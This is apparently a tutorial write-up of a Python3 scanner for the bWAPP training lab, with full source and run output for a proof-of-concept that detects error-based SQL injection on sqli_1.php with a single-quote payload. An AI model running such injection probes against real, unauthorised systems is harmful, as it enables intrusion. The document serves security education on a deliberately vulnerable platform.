python3 - bWAPP project - Python3 script implementation of the 2017 OWASP Top 10 A1 Injection: SQL injection (GET/Search)
1. Project background

Server, bWAPP platform:
The bwapp security test system was set up on the machine 192.168.40.248
http://192.168.40.248/bWAPP/sqli_1.php
It can be reached successfully and used for security testing

Client: Kali Linux 192.168.40.181
Python 3.6 is installed, with the following libraries:
ssl bs4 json redis urllib pexpect termcolor hashlib telnetlib pymysql pymongo

All project files are created on the client (all files have permission 755)
touch xxx.py
chmod 755 -R xxx.py
touch xxx.txt
chmod 755 -R xxx.txt
mkdir xxxx

2. Project description
2.1. All files in the project: the root directory

root@kali:~/bwapp# tree /root/bwapp
/root/bwapp
├── bWAPP.py
├── cookies.txt
├── injection
│   ├── __init__.py
│   ├── injectionmain.py
│   ├── __pycache__
│   │   ├── __init__.cpython-36.pyc
│   │   └── injectionmain.cpython-36.pyc
│   └── SQL_injection
│       ├── __init__.py
│       ├── __pycache__
│       │   ├── __init__.cpython-36.pyc
│       │   └── SQL_injection_get_search.cpython-36.pyc
│       └── SQL_injection_get_search.py
├── pocdb.py
└── __pycache__
    └── pocdb.cpython-36.pyc

5 directories, 12 files
root@kali:~/bwapp# 

File descriptions:
Root directory:
bWAPP.py is the main script
cookies.txt stores the most recent cookies from each login
injection is a folder for the injection class of OWASP Top 10 vulnerabilities; it contains the individual injection vulnerabilities
pocdb.py organises all OWASP Top 10 vulnerability classes; for each class it maps every concrete sub-vulnerability to its own class in a dictionary
__pycache__ is an empty folder that only holds cached temporary data
bWAPP.py script code

root@kali:~/bwapp# cat bWAPP.py 
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
'''
Author: xuweibo
description: bWAPP main
date: Created 2018-05-16
'''
import sys
import io
import time
import warnings
from termcolor import cprint
from injection.injectionmain import *
from pocdb import pocdb_pocs
from multiprocessing.dummy import Pool as ThreadPool
warnings.filterwarnings("ignore")
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
SEARCH_HISTORY = dict()

# Version number
VERSION = 'v1.0'

FLAGLET = '''
         \-\           /-/            /-/ /-/-\       |-|-----------| |-|-------------|
|-|       \ \         / / \          / / / / \ \      | |---------| | | |-----------| |
| |        \ \       / / \ \        / / / /   \ \     | |         | | | |           | |
| |_________\ \     / /   \ \      / / / /     \ \    | |_________| | | |___________| |
|_________  |\ \   / /     \ \    / / / /_______\ \   | |___________| | |_____________|
|         | | \ \ / /       \ \  / / / __________  \  | |             | |
|_________| |  \ \ /         \ \/ / / /           \ \ | |             | |
|___________|   \_/           \_\/ /-/             \ \|-|             |-|
'''
threads_num = 10
# Thread pool that runs the POCs in parallel
injectionpool = ThreadPool(threads_num)

def injectionprint(injectionname):
    msg = ">>>Testing injection vulns...."
    sys.stdout.write(msg+injectionname+" "*(len(msg)+10)+"\n")
    sys.stdout.flush()
    time.sleep(0.5)

def injectioncheck(injectionpoc):
    injectionpoc.run()

def injectionpoc_check(injectionurl):
    poc_class = pocdb_pocs(injectionurl)
    poc_dict = poc_class.injectionpocdict
    cprint(">>>Injection漏洞测试URL:"+injectionurl+"\t可用POC个数["+str(len(poc_dict))+"]", "magenta")
    injectionpool.map(injectionprint, poc_dict.keys())
    print ("\n")
    # Run every POC object registered for this URL
    injectionpool.map(injectioncheck, poc_dict.values())
    injectionpool.close()
    injectionpool.join()

def bWAPPMain(checkurl):
    try:
        # Run the injection POC checks against the target URL
        injectionpoc_check(checkurl)
    except Exception as e:
        print (e)
        cprint(">>>>>>>>>>>>>>>>>>超时","cyan")

if __name__ == '__main__':
    usage=FLAGLET+'''
           使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
    opt:
    ------------------------------------------------------------------------
    -h                       Get help
    -u                       Url
    -l                       List avalible pocs
    ------------------------------------------------------------------------
    Usage:
        1.python3.6 bWAPP.py -u http://www.example.com  对URL执行所有POC检测(暴力)
        2.python3.6 bWAPP.py -l 列出所有的POC        
    '''+'\nVersion is : '+VERSION
    if len(sys.argv) < 2 or sys.argv[1]=="-h":
        cprint(usage,"blue")
    elif sys.argv[1] == "-l":
        # List the names of the injection POCs
        pocclass = pocdb_pocs("")
        injectionclass = pocclass.injectionpocdict
        print("\t\t\tInjection POC")
        for injection in injectionclass:
            print("|"+injection+" ")
            print("|-------------------------------------------------|")
        print("\r")
    elif sys.argv[1] == "-u" and len(sys.argv) > 2:
        bWAPPMain(sys.argv[2])
    elif sys.argv[1] == "-u":
        # -u given without a URL: show the help instead of scanning "-u"
        cprint(usage,"blue")
    else:
        bWAPPMain(sys.argv[1])

root@kali:~/bwapp# 
Contents of cookies.txt

root@kali:~/bwapp# cat cookies.txt 
PHPSESSID=4c0d4229f5d980eae7cb9a5551957209; security_level=0
root@kali:~/bwapp# 
Contents of the pocdb.py script

root@kali:~/bwapp# ls
bWAPP.py  cookies.txt  injection  pocdb.py  __pycache__
root@kali:~/bwapp# cat pocdb.py 
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
'''
name: poc dictionary
author: xuweibo
description: entry point of the main script's API
'''

from injection.injectionmain import *
# Dictionary organising all OWASP Top 10 vulnerability classes: for each class, every
# concrete sub-vulnerability name (as shown on the test page) maps to its own class
class pocdb_pocs:
    def __init__(self, url):
        self.url = url
        self.injectionpocdict = {
                "SQL injection(GET/Search)": SQL_injection_get_search_BaseVerify(url)
                }
root@kali:~/bwapp# 

2.2. All files in the project: the injection directory

root@kali:~/bwapp# cd injection/
root@kali:~/bwapp/injection# tree /root/bwapp/injection/
/root/bwapp/injection/
├── __init__.py
├── injectionmain.py
├── __pycache__
│   ├── __init__.cpython-36.pyc
│   └── injectionmain.cpython-36.pyc
└── SQL_injection
    ├── __init__.py
    ├── __pycache__
    │   ├── __init__.cpython-36.pyc
    │   └── SQL_injection_get_search.cpython-36.pyc
    └── SQL_injection_get_search.py

3 directories, 8 files
root@kali:~/bwapp/injection# 

root@kali:~/bwapp/injection# ls
__init__.py  injectionmain.py  __pycache__  SQL_injection
root@kali:~/bwapp/injection# 

File descriptions:
injection directory:
__init__.py is an empty script file
injectionmain.py imports the class of each concrete injection vulnerability under the injection category
__pycache__ is an empty folder holding cached temporary data
SQL_injection is the folder for SQL injection
injectionmain.py script contents

root@kali:~/bwapp/injection# ls
__init__.py  injectionmain.py  __pycache__  SQL_injection
root@kali:~/bwapp/injection# cat injectionmain.py 
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-

# Import our own class from the script injection/SQL_injection/SQL_injection_get_search.py
from injection.SQL_injection.SQL_injection_get_search import SQL_injection_get_search_BaseVerify

root@kali:~/bwapp/injection# 

2.3. All files in the project: the SQL_injection directory

root@kali:~/bwapp/injection# cd SQL_injection/
root@kali:~/bwapp/injection/SQL_injection# tree /root/bwapp/injection/SQL_injection/
/root/bwapp/injection/SQL_injection/
├── __init__.py
├── __pycache__
│   ├── __init__.cpython-36.pyc
│   └── SQL_injection_get_search.cpython-36.pyc
└── SQL_injection_get_search.py

1 directory, 4 files
root@kali:~/bwapp/injection/SQL_injection# 

File descriptions:
SQL_injection directory:
__init__.py is an empty script file
__pycache__ is an empty folder holding cached temporary data
SQL_injection_get_search.py is the POC code for the concrete GET/Search vulnerability in the SQL injection class
SQL_injection_get_search.py script code

root@kali:~/bwapp/injection/SQL_injection# cat SQL_injection_get_search.py 
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
'''
name: injection SQL_injection SQL_injection_get_search.php (GET/SEARCH) SQL injection
author: xuweibo
description: the file SQL_injection_get_search.php has a GET/Search SQL injection
'''

import sys
import requests
import warnings
from termcolor import cprint

# Cookies saved by the login step, in the form "name=value; name=value"
COOKIE_FILE = "/root/bwapp/cookies.txt"

class SQL_injection_get_search_BaseVerify:
    def __init__(self, url):
        self.url = url

    def load_cookies(self):
        # Read the cookies from the project root; the with-block closes the
        # file once (the original closed it inside the loop, on the first pass)
        cookies = {}
        with open(COOKIE_FILE, "r") as f:
            for line in f.read().split(";"):
                line = line.strip()
                if not line:
                    continue
                name, value = line.split("=", 1)
                cookies[name] = value
        return cookies

    def run(self):
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
        payload = "?title=1%27&action=search"
        vulnurl = self.url + payload
        # Reference: https://www.v2ex.com/t/97347
        cookies = self.load_cookies()
        try:
            req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10)
            # Error-based check: the MySQL error text is echoed in the response body
            if r"You have an error in your SQL syntax" in req.text:
                cprint("[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)\nplyload: "+vulnurl, "red")
        except requests.RequestException:
            cprint("[-] "+__file__+"===================>连接超时","cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = SQL_injection_get_search_BaseVerify(sys.argv[1])
    testVuln.run()

root@kali:~/bwapp/injection/SQL_injection# 
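As an added example (not part of the project's code), the same GET/Search check written so it can be exercised offline: cookies.txt is parsed with the stdlib SimpleCookie, the probe URL is built with urlencode rather than a hand-encoded %27, and the HTTP fetch is injected as a callable. The cookie text and the response fragments are constructed samples, and urllib_fetch is an assumed live fetcher for the lab host.

```python
from http.cookies import SimpleCookie
from typing import Callable, Dict, Optional
from urllib.parse import urlencode
import urllib.request

# The same MySQL error text the project's POC greps for in the response.
SQL_ERROR_SIGNATURE = "You have an error in your SQL syntax"

# Constructed sample in the "name=value; name=value" format of cookies.txt.
COOKIE_TEXT = "PHPSESSID=4c0d4229f5d980eae7cb9a5551957209; security_level=0"
# Constructed response fragments standing in for sqli_1.php output.
VULNERABLE_BODY = "<p>Error: You have an error in your SQL syntax; check the manual</p>"
SAFE_BODY = "<td>No movies were found!</td>"

def parse_cookie_file(text: str) -> Dict[str, str]:
    """Parse cookies.txt with the stdlib cookie parser instead of split()."""
    jar = SimpleCookie()
    jar.load(text.strip())
    return {name: morsel.value for name, morsel in jar.items()}

def build_test_url(base_url: str, title: str) -> str:
    """Build the search URL; urlencode percent-encodes the quote (1' -> 1%27)."""
    return base_url + "?" + urlencode({"title": title, "action": "search"})

def has_sql_error(body: str) -> bool:
    """Error-based indicator: the database error text leaked into the HTML."""
    return SQL_ERROR_SIGNATURE in body

def urllib_fetch(url: str, cookies: Dict[str, str]) -> str:
    """Assumed live fetcher for the lab host (not used by the offline sample)."""
    header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    req = urllib.request.Request(url, headers={"Cookie": header})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")

def check_get_search(base_url: str, cookie_text: str,
                     fetch: Callable[[str, Dict[str, str]], str]) -> Optional[str]:
    """Return the probe URL when the page leaks a SQL error, otherwise None.

    fetch(url, cookies) -> body is injected so the logic runs without a live
    bWAPP host; pass urllib_fetch for the real lab machine.
    """
    cookies = parse_cookie_file(cookie_text)
    url = build_test_url(base_url, "1'")
    return url if has_sql_error(fetch(url, cookies)) else None
```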

3. Actual run

root@kali:~/bwapp/injection/SQL_injection# cd ..
root@kali:~/bwapp/injection# cd ..
root@kali:~/bwapp# clear
root@kali:~/bwapp# python3.6 bWAPP.py -u http://192.168.40.248/bWAPP/sqli_1.php
>>>Injection漏洞测试URLhttp://192.168.40.248/bWAPP/sqli_1.php  可用POC个数[1]
>>>Testing injection vulns....SQL injection(GET/Search)                                        


[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)
plyload: http://192.168.40.248/bWAPP/sqli_1.php?title=1%27&action=search
root@kali:~/bwapp# 
root@kali:~/bwapp# python3.6 bWAPP.py

         \-\           /-/            /-/ /-/-\       |-|-----------| |-|-------------|
|-|       \ \         / / \          / / / / \ \      | |---------| | | |-----------| |
| |        \ \       / / \ \        / / / /   \ \     | |         | | | |           | |
| |_________\ \     / /   \ \      / / / /     \ \    | |_________| | | |___________| |
|_________  |\ \   / /     \ \    / / / /_______\ \   | |___________| | |_____________|
|         | | \ \ / /       \ \  / / / __________  \  | |             | |
|_________| |  \ \ /         \ \/ / / /           \ \ | |             | |
|___________|   \_/           \_\/ /-/             \ \|-|             |-|

           使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
    opt:
    ------------------------------------------------------------------------
    -h                       Get help
    -u                       Url
    -l                       List avalible pocs
    ------------------------------------------------------------------------
    Usage:
        1.python3.6 bWAPP.py -u http://www.example.com  对URL执行所有POC检测(暴力)
        2.python3.6 bWAPP.py -l 列出所有的POC        

Version is : v1.0
root@kali:~/bwapp# 
root@kali:~/bwapp# python3.6 bWAPP.py -h

         \-\           /-/            /-/ /-/-\       |-|-----------| |-|-------------|
|-|       \ \         / / \          / / / / \ \      | |---------| | | |-----------| |
| |        \ \       / / \ \        / / / /   \ \     | |         | | | |           | |
| |_________\ \     / /   \ \      / / / /     \ \    | |_________| | | |___________| |
|_________  |\ \   / /     \ \    / / / /_______\ \   | |___________| | |_____________|
|         | | \ \ / /       \ \  / / / __________  \  | |             | |
|_________| |  \ \ /         \ \/ / / /           \ \ | |             | |
|___________|   \_/           \_\/ /-/             \ \|-|             |-|

           使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
    opt:
    ------------------------------------------------------------------------
    -h                       Get help
    -u                       Url
    -l                       List avalible pocs
    ------------------------------------------------------------------------
    Usage:
        1.python3.6 bWAPP.py -u http://www.example.com  对URL执行所有POC检测(暴力)
        2.python3.6 bWAPP.py -l 列出所有的POC        

Version is : v1.0
root@kali:~/bwapp# python3.6 bWAPP.py -l
            Injection POC
|SQL injection(GET/Search) 
|-------------------------------------------------|